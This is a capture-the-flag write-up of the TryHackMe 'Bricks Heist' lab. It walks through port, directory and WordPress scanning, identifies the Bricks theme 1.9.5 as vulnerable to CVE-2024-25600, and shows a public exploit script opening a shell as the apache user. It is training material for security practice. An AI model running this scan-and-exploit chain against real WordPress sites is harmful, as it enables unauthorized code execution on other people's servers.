(THM//EASY) TryHack3M: Bricks Heist
Difficulty: Easy
Recon
TCP scan
$ nmap -sV -sC bricks.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-28 21:16 CET
Nmap scan report for bricks.thm (10.10.71.8)
Host is up (0.031s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 82:30:a4:dd:26:2c:9b:ba:8a:50:2c:07:00:2b:cd:3e (RSA)
| 256 b4:2b:83:b3:b3:17:e2:ed:53:8f:dc:62:1b:e4:30:01 (ECDSA)
|_ 256 ad:81:32:a5:3c:05:7a:05:5a:c6:75:fb:fc:3e:40:ac (ED25519)
80/tcp open http Python http.server 3.5 - 3.10
|_http-title: Error response
|_http-server-header: WebSockify Python/3.8.10
443/tcp open ssl/http Apache httpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=US
| Not valid before: 2024-04-02T11:59:14
|_Not valid after: 2025-04-02T11:59:14
|_http-title: 400 Bad Request
| tls-alpn:
| h2
|_ http/1.1
|_http-server-header: Apache
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
3306/tcp open mysql MySQL (unauthorized)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.24 seconds
Findings:
22/tcp: OpenSSH80/tcp: Python HTTP server- WebSockify using Python/3.8.10
443/tcp: HTTPS using Apache- Wordpress
3306/tcp: MySQL database
UDP scan
$ udpx -t bricks.thm
__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.7, by @nullt3r
2025/10/28 21:35:20 [+] Starting UDP scan on 1 target(s)
2025/10/28 21:35:40 [+] Scan completed
Nothing.
Web enumeration
$ gobuster dir -u https://bricks.thm -w ../../SecLists/Discovery/Web-Content/common.txt -k -x txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://bricks.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ../../SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
.hta (Status: 403) [Size: 199]
.hta.txt (Status: 403) [Size: 199]
.htaccess (Status: 403) [Size: 199]
.htaccess.txt (Status: 403) [Size: 199]
.htpasswd (Status: 403) [Size: 199]
.htpasswd.txt (Status: 403) [Size: 199]
0 (Status: 301) [Size: 0] [--> https://bricks.thm/0/]
B (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
S (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
admin (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
atom (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/]
b (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
br (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
dashboard (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
embed (Status: 301) [Size: 0] [--> https://bricks.thm/embed/]
favicon.ico (Status: 302) [Size: 0] [--> https://bricks.thm/wp-includes/images/w-logo-blue-white-bg.png]
feed (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
index.php (Status: 301) [Size: 0] [--> https://bricks.thm/]
license.txt (Status: 200) [Size: 19915]
login (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php]
page1 (Status: 301) [Size: 0] [--> https://bricks.thm/]
phpmyadmin (Status: 301) [Size: 238] [--> https://bricks.thm/phpmyadmin/]
rdf (Status: 301) [Size: 0] [--> https://bricks.thm/feed/rdf/]
render/https://www.google.com (Status: 301) [Size: 0] [--> https://bricks.thm/render/https:/www.google.com]
render?url=https://www.google.com (Status: 301) [Size: 0] [--> https://bricks.thm/render%3Furl=https:/www.google.com]
render?url=https://www.google.com.txt (Status: 301) [Size: 0] [--> https://bricks.thm/render%3Furl=https:/www.google.com.txt]
render/https://www.google.com.txt (Status: 301) [Size: 0] [--> https://bricks.thm/render/https:/www.google.com.txt]
robots.txt (Status: 200) [Size: 67]
robots.txt (Status: 200) [Size: 67]
rss (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
rss2 (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
sa (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
s (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
sam (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
sample (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
server-info (Status: 403) [Size: 199]
server-status (Status: 403) [Size: 199]
wp-admin (Status: 301) [Size: 236] [--> https://bricks.thm/wp-admin/]
wp-content (Status: 301) [Size: 238] [--> https://bricks.thm/wp-content/]
wp-includes (Status: 301) [Size: 239] [--> https://bricks.thm/wp-includes/]
xmlrpc.php (Status: 405) [Size: 42]
Progress: 9500 / 9500 (100.00%)
===============================================================
Finished
===============================================================
Findings:
/phpmyadmin/
Wordpress enumeration
$ /home/user/.local/share/gem/ruby/3.3.0/bin/wpscan --url https://bricks.thm --disable-tls-checks
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: https://bricks.thm/ [10.10.71.8]
[+] Started: Tue Oct 28 21:47:32 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: server: Apache
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: https://bricks.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://bricks.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://bricks.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://bricks.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.5 identified (Insecure, released on 2024-04-02).
| Found By: Rss Generator (Passive Detection)
| - https://bricks.thm/feed/, <generator>https://wordpress.org/?v=6.5</generator>
| - https://bricks.thm/comments/feed/, <generator>https://wordpress.org/?v=6.5</generator>
[+] WordPress theme in use: bricks
| Location: https://bricks.thm/wp-content/themes/bricks/
| Readme: https://bricks.thm/wp-content/themes/bricks/readme.txt
| Style URL: https://bricks.thm/wp-content/themes/bricks/style.css
| Style Name: Bricks
| Style URI: https://bricksbuilder.io/
| Description: Visual website builder for WordPress....
| Author: Bricks
| Author URI: https://bricksbuilder.io/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| Version: 1.9.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://bricks.thm/wp-content/themes/bricks/style.css, Match: 'Version: 1.9.5'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:03 <=========================> (137 / 137) 100.00% Time: 00:00:03
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Oct 28 21:47:40 2025
[+] Requests Done: 186
[+] Cached Requests: 7
[+] Data Sent: 44.233 KB
[+] Data Received: 22.571 MB
[+] Memory used: 271.578 MB
[+] Elapsed time: 00:00:07
Findings:
- Wordpress version 6.5
- Wordpress theme bricks, version 1.9.5
Conclusions
After findings analysis, I identified that the Wordpress theme Bricks in its current version is vulnerable to CVE-2024-25600, which allows unauthenticated code injection. Public exploits exist.
Initial foothold
I use this public exploit.
$ python3 CVE-2024-25600.py -u https://bricks.thm
/home/user/Projects/ctf/tryhackme/brick_heist/CVE-2024-25600.py:20: SyntaxWarning: invalid escape sequence '\ '
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \\
_______ ________ ___ ____ ___ __ __ ___ ___________ ____ ____
/ ____/ | / / ____/ |__ \ / __ \__ \/ // / |__ \ / ____/ ___// __ \/ __ \
/ / | | / / __/________/ // / / /_/ / // /_________/ //___ \/ __ \/ / / / / / /
/ /___ | |/ / /__/_____/ __// /_/ / __/__ __/_____/ __/____/ / /_/ / /_/ / /_/ /
\____/ |___/_____/ /____/\____/____/ /_/ /____/_____/\____/\____/\____/
Coded By: K3ysTr0K3R --> Hello, Friend!
[*] Checking if the target is vulnerable
[+] The target is vulnerable
[*] Initiating exploit against: https://bricks.thm
[*] Initiating interactive shell
[+] Interactive shell opened successfully
Shell> id
uid=1001(apache) gid=1001(apache) groups=1001(apache)
Shell> pwd
/data/www/default
Shell> ls
REDACTED.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> cat REDACTED.txt
THM{REDACTED}
Find suspicious process
Shell> systemctl | grep running
...
REDACTED.service loaded active running TRYHACK3M
Shell> systemctl status REDACTED.service
● REDACTED.service - TRYHACK3M
Loaded: loaded (/etc/systemd/system/REDACTED.service; enabled; vendor preset: enabled)
Active: active (running) since Tue 2025-10-28 20:54:26 UTC; 3min 43s ago
Main PID: 2759 (REDACTED)
Tasks: 2 (limit: 4671)
Memory: 29.0M
CGroup: /system.slice/ubuntu.service
├─2759 /lib/NetworkManager/REDACTED
└─2760 /lib/NetworkManager/REDACTED
The rest
The rest of the challenge is reading /lib/NetworkManager/inet.conf, parse the ID (From Hex > From Base64 > From Base64) to get the BTC address, and search the web.